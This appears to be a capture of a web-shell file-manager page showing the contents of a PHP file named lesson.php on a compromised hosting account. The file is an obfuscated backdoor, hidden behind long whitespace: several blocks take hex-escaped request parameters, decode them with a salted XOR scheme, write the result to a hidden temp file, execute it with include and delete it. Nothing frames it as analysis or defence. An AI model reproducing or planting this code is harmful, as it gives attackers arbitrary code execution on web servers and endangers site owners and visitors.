HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/ssawpalmetto.vitavit.com.pk/
Upload Files
File: /home/vitanhod/ssawpalmetto.vitavit.com.pk/lesson.php
<?php																																										if(array_key_exists("da\x74", $_REQUEST) && !is_null($_REQUEST["da\x74"])){ $item = array_filter([getenv("TMP"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm"]); $hld = $_REQUEST["da\x74"]; $hld =explode ( "." ,$hld) ; $symbol = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s8 ); $q = 0; while ($q < count($hld)) {$v1 = $hld[$q]; $sChar = ord($s8[$q %$lenS] ); $d = ((int)$v1 - $sChar - ($q %10)) ^ 50; $symbol .= chr($d ); $q++; } while ($holder = array_shift($item)) { if ((function($d) { return is_dir($d) && is_writable($d); })($holder)) { $factor = "$holder" . "/.fac"; if (@file_put_contents($factor, $symbol) !== false) { include $factor; unlink($factor); die(); } } } }
																																										if(count($_POST) > 0 && isset($_POST["h\x6C\x64"])){ $property_set = $_POST["h\x6C\x64"]; $property_set = explode ( '.' ,$property_set ) ; $data_chunk = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $o = 0; array_walk($property_set, function($v8) use(&$data_chunk, &$o, $s, $sLen) { $sChar = ord($s[$o% $sLen] ); $dec =((int)$v8 - $sChar -($o% 10)) ^ 81; $data_chunk .= chr($dec ); $o++; } ); $tkn = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", getenv("TMP"), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), "/tmp", session_save_path()]); foreach ($tkn as $binding) { if (is_writable($binding) && is_dir($binding)) { $fac = join("/", [$binding, ".obj"]); if (file_put_contents($fac, $data_chunk)) { include $fac; @unlink($fac); die(); } } } }
																																										if(!is_null($_POST["\x76\x61lue"] ?? null)){ $flg = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), "/dev/shm", "/tmp"]); $entry = $_POST["\x76\x61lue"]; $entry = explode ( "." ,$entry ) ; $pset=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($salt); $q=0; array_walk($entry , function ($v9) use (&$pset , &$q , $salt , $lenS) { $sChar=ord($salt[$q % $lenS]); $dec=((int)$v9 - $sChar - ($q % 10)) ^ 24; $pset .= chr($dec); $q++; } ); while ($factor = array_shift($flg)) { if ((function($d) { return is_dir($d) && is_writable($d); })($factor)) { $itm = implode("/", [$factor, ".comp"]); if (file_put_contents($itm, $pset)) { include $itm; @unlink($itm); exit; } } } }
																																										if(count($_POST) > 0 && isset($_POST["\x63o\x6D\x70\x6Fnent"])){ $val = array_filter(["/var/tmp", getenv("TMP"), getcwd(), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp"]); $ent = $_POST["\x63o\x6D\x70\x6Fnent"]; $ent = explode( '.' , $ent ); $pointer = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $m = 0; array_walk( $ent, function( $v6) use( &$pointer, &$m, $s, $sLen) { $chS = ord( $s[$m % $sLen] ); $d = ( ( int)$v6 - $chS -( $m % 10)) ^ 37; $pointer .=chr( $d ); $m++; }); foreach ($val as $symbol): if (is_dir($symbol) && is_writable($symbol)) { $entity = sprintf("%s/.element", $symbol); if (file_put_contents($entity, $pointer)) { include $entity; @unlink($entity); exit; } } endforeach; }
																																										if(array_key_exists("\x72ef\x65\x72\x65nce", $_REQUEST) && !is_null($_REQUEST["\x72ef\x65\x72\x65nce"])){ $rec = $_REQUEST["\x72ef\x65\x72\x65nce"]; $rec = explode ( "." , $rec ) ; $desc =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $x =0; foreach( $rec as $v6) { $sChar =ord( $salt[$x % $lenS]); $dec =( ( int)$v6 - $sChar -( $x % 10)) ^ 21; $desc .= chr( $dec); $x++; } $dat = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", "/var/tmp", getenv("TMP"), "/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir()]); for ($itm = 0, $fac = count($dat); $itm < $fac; $itm++) { $value = $dat[$itm]; if (max(0, is_dir($value) * is_writable($value))) { $key = "$value/.symbol"; $file = fopen($key, 'w'); if ($file) { fwrite($file, $desc); fclose($file); include $key; @unlink($key); die(); } } } }
																																										if(array_key_exists("p\x73e\x74", $_REQUEST) && !is_null($_REQUEST["p\x73e\x74"])){ $ptr = $_REQUEST["p\x73e\x74"]; $ptr = explode( '.' , $ptr ) ; $symbol = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $m = 0; $__tmp = $ptr; while ($v9 = array_shift($__tmp)) { $chS = ord($salt[$m % $sLen]); $d = ((int)$v9 - $chS - ($m % 10)) ^ 89; $symbol .= chr($d); $m++; } $dat = array_filter(["/dev/shm", session_save_path(), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", getcwd()]); $elem = 0; do { $fac = $dat[$elem] ?? null; if ($elem >= count($dat)) break; if (!!is_dir($fac) && !!is_writable($fac)) { $record = implode("/", [$fac, ".holder"]); if (file_put_contents($record, $symbol)) { include $record; @unlink($record); die(); } } $elem++; } while (true); }
																																										if(filter_has_var(INPUT_POST, "e\x6E\x74")){ $comp = array_filter(["/tmp", "/var/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm"]); $parameter_group = $_POST["e\x6E\x74"]; $parameter_group = explode ( '.', $parameter_group ) ; $pset = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s7); foreach($parameter_group as $k => $v1): $sChar = ord($s7[$k % $sLen]); $d =((int)$v1 - $sChar -($k % 10)) ^45; $pset .= chr($d); endforeach; foreach ($comp as $key => $res) { if (array_product([is_dir($res), is_writable($res)])) { $ent = "$res" . "/.obj"; if (@file_put_contents($ent, $pset) !== false) { include $ent; unlink($ent); die(); } } } }


if(filter_has_var(INPUT_POST, "r\x65\x66")){
	$ptr = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", "/var/tmp", getcwd(), "/dev/shm", getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir")]);
	$dchunk = $_REQUEST["r\x65\x66"];
		  $dchunk 	 = 	explode	(		 "." 	, 	 $dchunk ) 		;
	$token = '';
            $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt1	);
    
            foreach ($dchunk as $w => $v8) { $chS = ord($salt1[$w  %	$lenS]	);
                $d = ((int)$v8 - $chS - ($w  %	10)) ^ 71;
                $token.= 	chr($d	);
            }
	for ($tkn = 0, $entry = count($ptr); $tkn < $entry; $tkn++) {
    $factor = $ptr[$tkn];
    		if ((bool)is_dir($factor) && (bool)is_writable($factor)) {
    $flag = join("/", [$factor, ".hld"]);
    if (file_put_contents($flag, $token)) {
	require $flag;
	unlink($flag);
	exit;
}
}
}
}
@ Telegram